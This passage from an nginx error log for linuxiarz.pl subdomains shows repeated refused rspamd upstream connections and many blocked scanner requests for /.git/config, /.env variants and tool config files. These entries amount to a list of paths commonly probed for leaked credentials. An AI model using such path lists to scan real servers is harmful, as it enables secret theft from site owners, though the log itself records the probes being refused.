85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:27 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:28 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/23 23:35:16 [error] 12269#12269: *267488 access forbidden by rule, client: 20.206.201.208, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/23 23:50:53 [error] 12269#12269: *267594 access forbidden by rule, client: 20.206.201.208, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/27 08:50:17 [error] 12269#12269: *309367 access forbidden by rule, client: 139.162.15.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/27 08:50:17 [error] 12269#12269: *309368 access forbidden by rule, client: 139.162.15.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/27 08:50:19 [error] 12269#12269: *309370 access forbidden by rule, client: 139.162.15.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/27 08:50:20 [error] 12269#12269: *309372 access forbidden by rule, client: 139.162.15.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/27 08:50:21 [error] 12269#12269: *309373 access forbidden by rule, client: 139.162.15.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/27 08:50:23 [error] 12269#12269: *309375 access forbidden by rule, client: 139.162.15.39, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/27 08:52:05 [error] 12269#12269: *309448 access forbidden by rule, client: 139.162.15.39, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/27 08:52:06 [error] 12269#12269: *309449 access forbidden by rule, client: 139.162.15.39, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/27 08:52:07 [error] 12269#12269: *309451 access forbidden by rule, client: 139.162.15.39, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/27 08:52:09 [error] 12269#12269: *309453 access forbidden by rule, client: 139.162.15.39, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/27 08:52:10 [error] 12269#12269: *309454 access forbidden by rule, client: 139.162.15.39, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/27 08:52:11 [error] 12269#12269: *309456 access forbidden by rule, client: 139.162.15.39, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/08/12 18:49:49 [error] 25728#25728: *53088 access forbidden by rule, client: 144.22.245.160, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/08/17 15:10:45 [error] 3039#3039: *3400 access forbidden by rule, client: 185.251.19.30, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/09/12 13:57:53 [error] 12279#12279: *339869 access forbidden by rule, client: 154.16.192.24, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/09/14 21:49:38 [error] 12279#12279: *374320 access forbidden by rule, client: 54.175.144.202, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/09/15 11:14:40 [error] 12279#12279: *382216 access forbidden by rule, client: 79.110.62.65, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/09/25 06:44:17 [error] 12279#12279: *520340 access forbidden by rule, client: 20.204.118.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2022/09/26 02:44:17 [error] 12279#12279: *535153 access forbidden by rule, client: 20.204.118.88, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "nginx.linuxiarz.pl" +2022/09/26 11:11:09 [error] 12279#12279: *541056 access forbidden by rule, client: 20.204.118.88, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "pliki.linuxiarz.pl" +2022/09/27 15:38:26 [error] 12279#12279: *558018 access forbidden by rule, client: 35.87.186.223, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/09/27 16:59:00 [error] 12279#12279: *558735 access forbidden by rule, client: 35.87.186.223, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/09/27 18:37:30 [error] 12279#12279: *559741 access forbidden by rule, client: 35.87.186.223, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/09 03:10:23 [error] 12279#12279: *710330 access forbidden by rule, client: 20.163.116.124, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/09 03:10:25 [error] 12279#12279: *710335 access forbidden by rule, client: 20.163.116.124, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/13 07:21:29 [error] 15352#15352: *12432 access forbidden by rule, client: 20.163.24.199, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/13 07:25:14 [error] 15352#15352: *12460 access forbidden by rule, client: 20.163.24.199, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/13 07:28:53 [error] 15352#15352: *12523 access forbidden by rule, client: 20.163.24.199, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/13 10:23:56 [error] 15352#15352: *13599 access forbidden by rule, client: 20.163.24.199, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/13 10:26:55 [error] 15352#15352: *13624 access forbidden by rule, client: 20.163.24.199, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/13 10:30:19 [error] 15352#15352: *13665 access forbidden by rule, client: 20.163.24.199, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/10/21 07:45:08 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.config/gatsby/config.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:08 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.cordova/config.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:09 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.deployment-config.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:09 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.docker/config.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:10 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.docker/daemon.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:10 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.jupyter/jupyter_notebook_config.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:11 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.lanproxy/config.json HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:13 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:13 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:13 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.dist HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:14 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:14 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:14 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:15 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:15 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:16 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /beta/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:16 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /kyc/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:17 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:17 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:17 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:18 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.docker.dev HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:18 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.php HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:19 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:19 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:20 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.sample.php HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:21 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:21 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:21 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.test HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:22 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.test.localapi/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:22 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.docker/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:23 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:25 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.environment HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:26 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.envrc HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:26 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.envs HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:26 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env~ HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:27 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.gitlab-ci/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:27 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.vscode/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:27 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /mailer/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:28 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /twitter/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:45:28 [error] 15352#15352: *149118 access forbidden by rule, client: 52.66.226.54, server: kompilacje.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/10/21 07:47:55 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.config/gatsby/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:47:56 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.cordova/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:47:56 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.deployment-config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:47:57 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.docker/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:47:58 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.docker/daemon.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:47:58 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.jupyter/jupyter_notebook_config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:47:58 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.lanproxy/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:00 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:00 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:02 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.dist HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:03 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:03 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:03 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:04 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:04 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:05 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /beta/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:05 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /kyc/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:06 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:06 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:07 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:07 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.docker.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:08 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:08 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:09 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:09 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.sample.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:10 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:10 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:11 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.test HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:11 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env.test.localapi/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:12 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.docker/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:12 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:13 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.environment HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:13 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.envrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:14 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.envs HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:14 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:14 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.gitlab-ci/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/10/21 07:48:15 [error] 15352#15352: *149249 access forbidden by rule, client: 52.66.226.54, server: nginx.linuxiarz.pl, request: "GET /.vscode/.env 